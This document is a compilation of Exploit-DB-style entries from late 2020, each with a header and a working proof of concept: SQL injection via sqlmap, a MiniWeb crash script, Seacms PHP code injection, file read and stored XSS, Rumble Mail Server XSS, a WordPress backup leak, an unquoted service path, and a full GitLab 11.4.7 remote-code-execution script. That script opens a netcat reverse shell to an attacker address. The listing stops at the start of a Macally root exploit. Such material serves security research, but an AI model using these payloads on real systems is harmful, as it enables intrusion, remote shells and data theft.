# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application

Note: the Vendor Homepage and Software Link above point to the "Task Management System" package on sourcecodester, not to a Courier Management System; verify that the downloaded package matches the tested target before reproducing. The steps below are the same as for the 'MULTIPART street' finding, but the injected parameter reported by sqlmap is "ref_no", which does not appear in the new-branch form listed in that finding; confirm which request actually carries "ref_no".

Step 1. Log into the application with valid credentials (this is an authenticated injection: the captured request must carry the session cookie).
Step 2. Click on Branch.
Step 3. Select New Branch: http://127.0.0.1/index.php?page=new_branch
Step 4. Fill in the form and click Save.
Step 5. Capture the request to "/ajax.php?action=save_branch" in Burp Suite.
Step 6. Save the request to a file and run sqlmap against it: sqlmap -r request --time-sec=5 --dbs
Step 7. sqlmap confirms the time-based blind injection and can enumerate the database contents.

---
Parameter: ref_no (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ref_no=123' AND (SELECT 5575 FROM (SELECT(SLEEP(5)))ngIo) AND 'knst'='knst
---
-
MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
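#!/usr/bin/python
# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
# Date: 13.12.2020
# Exploit Author: securityforeveryone.com
# Author Mail: hello[AT]securityforeveryone.com
# Vendor Homepage: https://sourceforge.net/projects/miniweb/
# Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
# Version: 0.8.19
# Tested on: Win7 x86
# Researchers: Security For Everyone Team - https://securityforeveryone.com
'''
Description

MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service
(daemon crash) via a long name for the first parameter in a POST request.

Exploitation

The vulnerable field is the name of the first parameter of the POST body.
Example: PARAM_NAME1=param_data1&param_name2=param_data2
If we send a long run of "A" characters as PARAM_NAME1, the MiniWeb server crashes.
(The original listing rendered "&param_name2" as a pilcrow: an HTML-entity
artefact, restored here.)

About Security For Everyone Team

We are a team that has been working on cyber security in the industry for a
long time. In 2020, we created securityforeveryone.com where everyone can test
their website security and get help to fix their vulnerabilities. We have many
free tools that you can use here: https://securityforeveryone.com/free-tool-list
'''
import socket
import sys

TCP_PORT = 8000
# Length of the first parameter name.  The original PoC also carried "4085"
# as a commented-out alternative; its significance is not documented.
PARAM_NAME_LEN = 2038
_BODY_TAIL = "=param_data1&param_name2=param_data2"


def build_request(host, length=PARAM_NAME_LEN):
    """Return the raw HTTP POST (bytes) whose first form-field name is *length* 'A's.

    *host* is placed in the Host header (the original hard-coded
    192.168.231.140).  As in the original, no Content-Length header is
    sent; MiniWeb evidently parses the body regardless.
    """
    body = "A" * length + _BODY_TAIL
    head = ("POST /index.html HTTP/1.1\r\n"
            "Host: %s\r\n"
            "From: header-data\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n" % host)
    return (head + body).encode("ascii")


def send_payload(host, port=TCP_PORT):
    """Connect to *host*:*port*, send the PoC request and close the socket."""
    req = build_request(host)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        print("[+] Sending exploit payload...")
        s.sendall(req)   # send() may write only part of the buffer
    finally:
        s.close()


def main(argv):
    """Entry point: ``exploit.py [VICTIM_IP]``."""
    if len(argv) != 2:
        print("[+] Usage : python exploit.py [VICTIM_IP]")
        sys.exit(0)
    send_payload(argv[1])


if __name__ == "__main__":
    main(sys.argv)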
-
Seacms 11.1 - 'ip and weburl' Remote Command Execution
# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution
# Date: 20201212
# Exploit Author: j5s
# Vendor Homepage: https://www.seacms.net/
# Software Link: https://www.seacms.net/
# Version: 11.1

POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1
Host: 192.168.137.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://192.168.137.139
Connection: close
Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php
Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; PHPSESSID=t1gc019b35rrgmr1dg53gfje96; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Upgrade-Insecure-Requests: 1

v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F

Vulnerable parameter: ip
Payload (URL-decoded): ";phpinfo();//

Notes: the request targets admin_ip.php inside the (renamed) admin directory "5f9js3" and carries an authenticated PHPSESSID, so this is a post-authentication issue: an administrator session is required. The payload closes a double-quoted string and appends PHP code, which is consistent with the "ip" value being written into a PHP file that is later included; confirm in admin_ip.php. Only the "ip" parameter is demonstrated here; the "weburl" parameter named in the title is not shown in this request.
-
System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
# Date: 2020-10-14
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://systemexplorer.net/
# Software Link: http://systemexplorer.net/download/SystemExplorerSetup.exe
# Version: Version 7.0.0
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Service info:

C:\Users\m507>sc qc SystemExplorerHelpService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SystemExplorerHelpService
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : System Explorer Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

# Exploit:
The service binary path is unquoted and contains spaces, so when the service starts, Windows may try "C:\Program.exe", "C:\Program Files (x86)\System.exe" and "C:\Program Files (x86)\System Explorer\service.exe" before the real binary. A local user who can write to one of those locations can have their executable run as LocalSystem.

Practical caveats: on a default Windows install a non-administrator cannot write to C:\ or to C:\Program Files (x86)\, so this is only exploitable where those ACLs have been loosened (check with icacls before reporting it as a privilege escalation). The service is DEMAND_START (START_TYPE 3), not automatic, so the planted binary runs only when the service is started, by a reboot-time trigger or by a user with start rights, rather than at every boot.
-
Seacms 11.1 - 'checkuser' Stored XSS
# Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS
# Date: 20201212
# Exploit Author: j5s
# Vendor Homepage: https://www.seacms.net/
# Software Link: https://www.seacms.net/
# Version: 11.1

POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1
Host: 192.168.137.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://192.168.137.139
Connection: close
Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting
Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; PHPSESSID=t1gc019b35rrgmr1dg53gfje96; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Upgrade-Insecure-Requests: 1

checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4

Vulnerable parameter: checkuser
Payload: "><ScRiPt>alert(document.cookie)</ScRiPt>

Notes: the captured request actually sends "><sCrIpT>alert(1)</sCrIpT> (URL-encoded above); the alert(document.cookie) variant listed as the payload is an equivalent substitution. The endpoint is the admin settings page (admin_safe.php under the renamed admin directory) and the request carries an authenticated PHPSESSID, so storing the payload requires an administrator session; the impact is on whoever later views the page where "checkuser" is rendered.
-
WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
# Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/")
# Date: 2020-12-12
# Exploit Author: Wadeek
# Vendor Homepage: https://www.boldgrid.com/
# Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip
# Version: 1.14.9
# Tested on: BackBox Linux

1) The 'readme.txt' file reveals the plugin version:

-> GET /wp-content/plugins/boldgrid-backup/readme.txt

Stable tag: 1.14.9

2) The 'env-info.php' file reveals the following information without authentication:

-> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php

{
  [...],
  "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x86_64",
  "php_version":"7.X.X",
  "server_addr":"127.0.0.1",
  "server_name":"www.example.com",
  "server_protocol":"HTTP/1.1",
  "server_software":"Apache/2.X.XX (Ubuntu)",
  "uid":XX,
  "username":"www-data"
}

3) The 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication:

-> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json

{
  [...]
  "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
  [...]
}

Note: the randomised directory and file names are the only thing protecting the archive; once "filepath" is leaked, the full files-plus-database backup can be fetched directly if that directory is served by the web server (no WordPress authentication is involved in any of the three requests above).
-
Seacms 11.1 - 'file' Local File Inclusion
# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion # Date: 20201212 # Exploit Author: j5s # Vendor Homepage: https://www.seacms.net/ # Software Link: https://www.seacms.net/ # Version: 11.1 GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1 Host: 192.168.137.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; PHPSESSID=t1gc019b35rrgmr1dg53gfje96; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D Upgrade-Insecure-Requests: 1 Vulnerable parameter: file. Payload: C:/windows/system.ini. The absolute path is passed unchanged to the download action, so any file the web server process can read is returned to the client (in effect an arbitrary file read/download rather than an include). The request is issued against admin_safe.php under the admin directory with a PHPSESSID cookie, so reproducing it appears to require an authenticated admin session.
-
Rumble Mail Server 0.51.3135 - 'username' Stored XSS
# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Exploit: POST /users HTTP/1.1 Host: 127.0.0.1:2580 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 96 Origin: http://127.0.0.1:2580 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://127.0.0.1:2580/users Upgrade-Insecure-Requests: 1 username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit HTTP/1.1 200 OK Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="/favicon.ico " /> <title>RumbleLua</title> <link href="rumblelua2.css" rel="stylesheet" type="text/css" /> </head> <body> <div class="header_top"> <div class="header_stuff"> RumbleLua on a.com<br /> <span class="fineprint">Rumble Mail Server v/0.51.3135 <br /> </span> <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a> <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a> <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a> <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a> <a href="/modules"><img src="/icons/plugin_edit.png" 
align="absmiddle" /> Set up modules</a> <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a> <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a> </div> </div> <div id="contents"> <h1>RumbleLua users </h1> <p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br /> Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br /> while regular users can only see and edit the domains they have access to. </p> <table class="elements"> <tr> <th>Create a new user:</th> </tr> <tr> <td> <form action="/users" method="post" name="makeuser"> <div style="width: 300px; text-align:right; float: left;"> <label for="username"><strong>Username:</strong></label> <input name="username" autocomplete="off" type="text" id="username" > <br> <label for="password"><strong>Password:</strong></label> <input type="password" autocomplete="off" name="password" id="password"> <br /> <label for="password"><strong>Access rights:</strong></label> <select name="rights" size="4" style="width: 150px;" multiple="multiple"> <option value="*" style="color:#C33; font-weight:bold;">Full control</option> <optgroup label="Domains:"> </optgroup> </select> </div> <p><br /><br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <input type="submit" name="submit" id="submit" value="Submit" /> </p> </form> </td> </tr> </table> <table width="200" class="elements"> <tr> <th>Username</th> <th>Rights</th> <th>Actions</th> </tr> <tr> <td><img src="/icons/action_lock.png" align="absmiddle"/> <strong><font color='#006600'><script>alert("M507")</script></font></strong></td> <td>Full control</td> <td> <a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a> <a 
href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a> </td> </tr> <tr> <td><img src="/icons/action_lock.png" align="absmiddle"/> <strong><font color='#006600'>admin</font></strong></td> <td>Full control</td> <td> <a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a> <a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a> </td> </tr> <tr> <td><img src="/icons/action_lock.png" align="absmiddle"/> <strong><font color='#006600'><script>alert("M5072")</script></font></strong></td> <td>Full control</td> <td> <a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a> <a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a> </td> </tr> </table> <p> </p> </div> <br /> <p align="center"> Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>] </p> </body> </html>
-
Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Exploit: POST /settings:save HTTP/1.1 Host: 127.0.0.1:2580 Connection: keep-alive Content-Length: 343 Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:2580 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1:2580/settings Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings HTTP/1.1 302 Moved Location: /settings:save HTTP/1.1 200 OK Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="/favicon.ico " /> <title>RumbleLua</title> <link href="rumblelua2.css" rel="stylesheet" type="text/css" /> </head> <body> <div class="header_top"> 
<div class="header_stuff"> RumbleLua on <script>alert(xss.com)</script><br /> <span class="fineprint">Rumble Mail Server v/0.51.3135 <br /> </span> <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a> <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a> <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a> <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a> <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a> <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a> <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a> </div> </div> <div id="contents"> <h1>Server settings</h1> Saving config/rumble.conf </div> <br /> <p align="center"> Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>] </p> </body> </html> Note: the stored value comes back as alert(xss.com) — the double quotes in the submitted alert("xss.com") were apparently dropped when the setting was saved to rumble.conf — so this exact payload throws a ReferenceError instead of executing visibly. Use a quote-free payload such as <script>alert(document.domain)</script> to confirm script execution. The request requires valid admin credentials (Authorization: Basic) and, being part of the server settings form, also re-submits runas=root, so only run it against a test instance.
-
Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Info The parameters `domain` and `path` are vulnerable to stored XSS. # Exploit: POST /domains HTTP/1.1 Host: 127.0.0.1:2580 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 119 Origin: http://127.0.0.1:2580 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert( Upgrade-Insecure-Requests: 1 domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true HTTP/1.1 200 OK Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="/favicon.ico " /> <title>RumbleLua</title> <link href="rumblelua2.css" rel="stylesheet" type="text/css" /> </head> <body> <div class="header_top"> <div class="header_stuff"> RumbleLua on a<br /> <span class="fineprint">Rumble Mail Server v/0.51.3135 <br /> </span> <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a> <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a> <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a> <a 
href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a> <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a> <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a> <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a> </div> </div> <div id="contents"> <h2>Domains</h2> <p> <table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td> <form action="/domains" method="post" id='create'> <div> <div > <div class='form_key'> Domain name: </div> <div class='form_value'> <input type="text" name="domain"/> </div> </div> <div> <div class='form_key'> Optional alt. storage path: </div> <div class='form_value'> <input type="text" name="path"/> </div> </div> <div class='form_el' id='domainsave' > <div class='form_key'> <input type="hidden" name="create" value="true"/> <input class="button" type="submit" value="Save domain"/> <input class="button" type="reset" value="Reset"/> </div> </div> <br/><br/><br/><br/><br /> </div> </form> </td></tr></table></p> <p> </p> <table class="elements" border='0' cellpadding='5' cellspacing='1'> <tr><th>Domain</th><th>Actions</th></tr> <tr><td><img src='/icons/house.png' align='absmiddle'/> <a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a> <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table> </div> <br /> <p align="center"> Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a 
href="https://sourceforge.net/projects/rumble/">project home</a>] </p> </body> </html>
-
GitLab 11.4.7 - Remote Code Execution (Authenticated) (1)
# Exploit Title: Gitlab 11.4.7 - Remote Code Execution
# Date: 14-12-2020
# Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox
# Vendor Homepage: https://about.gitlab.com/
# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
# Tested On: Debian 10 + Apache/2.4.46 (Debian)
# Version: 11.4.7 community
#
# Flow (authenticated user required): GET /projects/new to learn the caller's
# namespace id, then POST /projects with an import_url that points the
# repository importer at the local Redis (port 6379). The body of that URL is
# a Redis command stream that enqueues a Sidekiq GitlabShellWorker job whose
# class_eval argument runs a reverse shell back to localip:localport; a local
# netcat listener is started to receive it.
import sys
import requests
import time
import random
import http.cookiejar
import os.path
from os import path
# Sign in GitLab 11.4.7 portal and get (using Burp or something other):
# authenticity_token
# authenticated cookies
# username
# specify localport and localip for reverse shell
# NOTE(review): the token and session cookie below are per-session values from
# the author's lab and must be replaced before each run. sys, time,
# http.cookiejar and path are imported but never used.
username='aaaaaaaaaaaa'
authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g=='
cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false'
# localport stays a string: it is concatenated into the payload and the nc command line.
localport='1234'
localip='192.168.0.114'
url = "http://192.168.0.130:5080"
# NOTE(review): defined but never passed to any request; add proxies=proxies to
# the session calls in init() if you want Burp in the path.
proxies = { "http": "http://localhost:8080" }


def deb(str: str) -> None:
    """Print a "Debug => ..." line (the parameter name shadows the builtin str)."""
    print("Debug => "+str)


def create_payload(authenticity_token: str, prgname: str, namespace_id: str, localip: str, localport: str, username: str) -> dict[str, str]:
    """Return the form fields for POST /projects that trigger the bug.

    Args:
        authenticity_token: CSRF token taken from the logged-in session.
        prgname: random project name, also used as path and description.
        namespace_id: value scraped from the project_namespace_id input.
        localip, localport: where the reverse shell should connect back to.
        username: the logged-in user, used in the trailing git path.

    The interesting field is project[import_url]. It targets port 6379 on the
    IPv6-mapped loopback address [0:0:0:0:0:ffff:127.0.0.1], presumably to
    get past the importer's localhost check (see the POC write-up). Each
    "\\n"-separated line after the host is meant to be read by Redis as a
    command: MULTI, SADD the queue name, LPUSH a JSON Sidekiq job, EXEC. The
    job is a GitlabShellWorker with args ["class_eval", "open('|nc ...').read"],
    i.e. a Ruby pipe-open that spawns nc -e /bin/sh back to localip:localport.
    The trailing "/<username>/<prgname>.git" keeps the value looking like a
    git URL.

    Caveats: "nc -e" needs a netcat build with -e on the GitLab host; the jid
    and timestamps are fixed literals; the '' key whose value is
    'project[initialize_with_readme]' looks like a swapped key/value pair and
    is left untouched.
    """
    return {'utf8':'✓',
            'authenticity_token':authenticity_token,
            'project[ci_cd_only]':'false',
            'project[name]':prgname,
            'project[namespace_id]':namespace_id,
            'project[path]':prgname,
            'project[description]':prgname,
            'project[visibility_level]':'20',
            '':'project[initialize_with_readme]',
            'project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'}


import string


def random_string(length: int) -> str:
    """Return `length` random ASCII letters (used as a throwaway project name)."""
    return ''.join(random.choice(string.ascii_letters) for m in range(length))


def init(username: str, cookie: str, authenticity_token: str, localport: str, localip: str) -> None:
    """Run the exploit against the module-level `url`.

    Steps: GET /projects/new with the session cookie, scrape the
    project_namespace_id input, build and URL-encode the payload, POST it to
    /projects, then block in a local `nc -nvlp <localport>` listener.

    Caveats (review): nsid[0] raises IndexError if the form is missing, e.g.
    when the cookie/session is no longer valid; the POST response is never
    checked; the listener is started only after the POST, so if the job fires
    before nc is up the callback may be lost - start a listener beforehand to
    be safe. `re` is imported but unused.
    """
    from bs4 import BeautifulSoup
    import re
    import urllib.parse
    deb("Token: "+authenticity_token)
    deb("Cookie: "+cookie)
    session=requests.Session()
    headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'}
    r=session.get(url+'/projects/new',headers=headers,allow_redirects=True)
    soup = BeautifulSoup(r.content,"lxml")
    nsid = soup.findAll('input', {"id": "project_namespace_id"})
    namespace_id=nsid[0]['value'];
    deb("Namespace ID: "+namespace_id)
    prgname=random_string(8)
    newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username)
    newpayload=urllib.parse.urlencode(newpayload)
    deb("Payload encoded: "+newpayload)
    r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False)
    # Blocks here until the reverse shell connects and the nc session ends.
    os.system("nc -nvlp "+localport)


# NOTE(review): runs on import - there is no __main__ guard.
init(username,cookie,authenticity_token,localport,localip)
-
Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
# Date: 03.12.2020
# Exploit Author: Maximilian Barz and Daniel Schwendner
# Vendor Homepage: https://us.macally.com/products/wifisd2
# Version: 2.000.010
# Tested on: Kali Linux 5.7.0-kali1-amd64
# CVE : CVE-2020-29669
# Reference: https://github.com/S1lkys/CVE-2020-29669/
# NOTE(review): the shebang below is not on line 1 and "env/python3" is not a
# valid interpreter path; it should read "#!/usr/bin/env python3" at the top.
#!/usr/bin/env/python3
import requests
import telnetlib
import os
import sys
import re
# ANSI-coloured ASCII-art banner, printed before the attack starts.
